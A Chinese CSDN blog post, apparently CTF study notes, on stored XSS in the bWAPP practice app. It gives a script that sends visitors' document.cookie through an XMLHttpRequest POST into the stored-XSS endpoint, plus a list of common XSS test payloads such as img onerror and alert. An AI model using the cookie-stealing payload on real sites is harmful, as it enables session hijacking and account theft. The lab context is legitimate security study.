xss-javascript发送数据包-ctf

最新推荐文章于 2023-04-23 16:30:13 发布
最新推荐文章于 2023-04-23 16:30:13 发布
阅读量372 收藏 1
点赞数
分类专栏: 学海无涯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/119600959
版权

javascript 制作存储型xss发送数据包

<script>
    xhr = new XMLHttpRequest();
    xhr.open("post", "/bWAPP/xss_stored_1.php", true);  //请求类型,url
    xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded');  //头部字段
    xhr.send("entry=" + document.cookie + "&blog=submit&entry_add="); //包体内容
</script>

常用xss函数

1    <script>alert("ethan")</script>

2    <script>prompt("ethan")</script>

3    <script>confirm("ethan")</script>

4    <img src=xxx onerror=alert("ethan")>

5    <script>var r=confirm('你们有在好好听课吗?'); if(r==true) {alert('你选择了确定');} else{alert('你选择了取消');}</script>

6

时光凉春衫薄
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xss攻击(post)流量数据包
07-18
xss攻击(post)流量数据包
xhr发起POST请求(原生)
m0_50599032的博客
12-04 6370
1.创建xhr对象 var xhr = new XMLHttpRequest() 2.调用open() xhr.open(‘POST’,‘请求的地址’ ) 3. 设置Content-Type 属性(注意这是固定写法) xhr.setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’) 4.调用send() (若果要提交数据,以字符串的形式提交) 例:xhr.send(‘name-张三&age-18&sex-男’
xhr 的简单使用
江玉郎
08-30 4351
Ajax = Asynchronous JavaScript and XML(异步的 JavaScript 和 XML)。 Ajax 不是新的编程语言,而是一种使用现有标准的新方法。 它最大的优点是在不重新加载整个页面的情况下,可以与服务器交换数据并更新部分网页内容。并且不需要任何浏览器插件,但需要用户允许JavaScript在浏览器上执行。 总的来说,就是: ajax 是数据请求方式的一...
使用xhr发起POST请求
m0_54882260的博客
02-01 656
创建 xhr 对象 调用 xhr.open() 函数 设置 Content-Type 属性(固定写法) 调用 xhr.send() 函数,同时指定要发送的数据 监听 xhr.onreadystatechange 事件 // 1. 创建 xhr 对象 var xhr = new XMLHttpRequest() // 2. 调用 open 函数 xhr.open('POS...
前端学习--Ajax(3) XHR/axios
Michelle209的博客
04-23 1603
它允许客户端在不重新加载整个页面的情况下向服务器发送请求,并根据服务器的响应更新页面的局部内容。其中key必须是双引号包裹的英文字符串,value的数据类型可以是数字、字符串、布尔值、null、对象、数组六种类型,数组结构的类型可以是数字、字符串、布尔值、null、对象、数组六种类型。JSON不能写注释,不能用单引号表示字符串,最外层必须是对象或数组格式。JSON实际上是一种JavaScript对象的表示方式,本质是字符串。get请求携带参数的本质是将参数以查询字符串的形式追加到url的后面。
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
第八节 Javascript伪协议的XSS-01
最新发布
09-15
"第八节 Javascript伪协议的XSS-01" Javascript伪协议是一种特殊的协议类型,它可以将javascript代码添加到客户端,javascript伪协议的URL中包含javascript代码,浏览器会将其解释为javascript语句,并执行之。...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
学习Ajax
qq_51787166的博客
05-16 368
什么是 Ajax? Ajax 的意思就是异步的 JavaScript 和 XML。简而言之,它是使用 XMLHttpRequest 对象与服务器端通信的脚本语言。它可以发送及接收各种格式的信息,包括 JSON、XML、HTML 和文本文件。 Ajax 最为吸引人的就是它的“异步”特性,这意味着 Ajax 可以无需刷新页面而与服务器端进行通信。允许你根据用户事件来更新部分页面内容。 可以考虑的两个特性: 向服务器端发送请求,而不用重新加载页面。 从服务器端接收数据并处理。 第
Ajax--概述、xhr对象的常用属性和方法、xhr的常用事件、xhr对象发送POST请求、xhr对象发送GET请求、xhr对象的兼容性问题、数据交换格式(XML、JSON)
小白小白从不日别的博客
05-18 4227
主要介绍了Ajax
三种发起请求的方式
ovocc的博客
04-28 2412
客户端和服务器进行通信主要是请求-处理-响应过程,这里整理一下三钟用户发起请求的三种方式
xhr的get和post请求的简单实现
热门推荐
qq_39138295的博客
08-30 2万+
        ajax技术的核心是XMLHttpRequest对象(简称XHR),XHR为向服务器发送请求和解析服务器响应提供了流畅的接口,能够以异步方式从服务器取得更多信息。 ajax是数据请求方式的一种。 特点: 1:前端可以发送数据到后端 2. 可以接收从后端传过来的数据 3:可以解析从后端传过来的数据 4:可以对页面进行局部刷新操作--&gt; xhr数据请求流程: 1....
xhr.open("POST", "../servlet/testServlet?timeStamp=" + new Date().getTime(), true);
云计算?
02-02 612
window.onload = function(){document.getElementById("ok").onclick = function(){var xhr = ajaxFunction();xhr.open("POST", "../servlet/testServlet?timeStamp=" + new Date().getTime(), true);//如果请求类型是POST的...
xhr如何发送post请求_ajax-如何发送ajax请求
weixin_39779528的博客
12-19 901
什么是ajax?Asynchronous JavaScript and XML也就是异步的JavaScript和XMLajax的使用场景前台获取数据表单失焦验证我们需要了解post和get区别get参数是在地址栏中,大小2000个字符左右post参数是在请求体中,网速良好,理论上是无限大的如何构建一个完整的ajax请求注意:一般情况下只能在有服务的环境下发送请求ajax是局部刷新1.创建ajax对...
SpringMVC Ajax上传文件实例
我的笔记
10-15 523
做了一个文件上传模块,因为传统的form提交会有页面刷新,不符合我的使用要求,所以我采用Ajax提交方式,这里说明下,我的应用程序前端为Ajax提交,后端SpringMVC接收处理。 传统form提交文件方式: &lt;form id="uploadPic" action="/user/saveHeaderPic" method="post" enctype="multipart/form-...
43 Ajax xhr请求 数据交换格式json 封装ajax函数 FormData 上传进度条 axios发起请求
Write less,do more
09-16 542
目标 能够知道如何使用XMLHttpRequest发起Ajax请求 能够知道如何封装自己的Ajax函数 能够使用XMLHttpRequest Level2中提供的新特性 能够知道jQuery中如何实现文件上传与loading效果 能够知道如何使用axios发起Ajax请求 XMLHttpRequest的基本使用 什么XMLHttpRequest XMLHttpRequest(简称 xhr)是浏览器提供的 Javascript 对象,通过它,可以请求服务器上的数据资源。之 前所学的 jQuery 中的 A
前端网络基础-通过XMLHttpRequest实现AJAX(一)
伏城之外的博客
12-26 2217
Ajax介绍 Ajax(Asynchronous Javascript And XML)即 异步的Javascript和XML。 Ajax是指通过JavaScript发送异步的HTTP请求请求数据的格式采用XML。 Ajax有三个特点: 1、A:async Ajax一个重要特征就是它可以发送异步的HTTP请求。 而在Ajax出现以前,只有通过刷新网页来实现人为发起同步的HTTP请求。当然也有一些标签支持发起异步的HTTP请求,比如script标签(带defer或async属性),lin..
X-XSS-Protection缺失 修复
06-13
X-XSS-Protection是一个HTTP响应头,用于防止跨站脚本攻击(XSS)。如果该头缺失,可能会导致攻击者通过注入恶意脚本来攻击网站用户。为了修复这个问题,您可以在Web服务器或应用程序中配置该头。以下是一些具体的步骤: 1. 在Web服务器上配置X-XSS-Protection头。例如,在Apache服务器中,您可以在配置文件中添加以下行: Header set X-XSS-Protection "1; mode=block" 2. 在应用程序中使用编程语言来添加X-XSS-Protection头。例如,在PHP中,您可以使用以下代码: header("X-XSS-Protection: 1; mode=block"); 3. 使用Web应用程序防火墙(WAF)来过滤和阻止恶意脚本。 无论哪种方法,都应该测试您的网站以确保X-XSS-Protection头已正确配置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值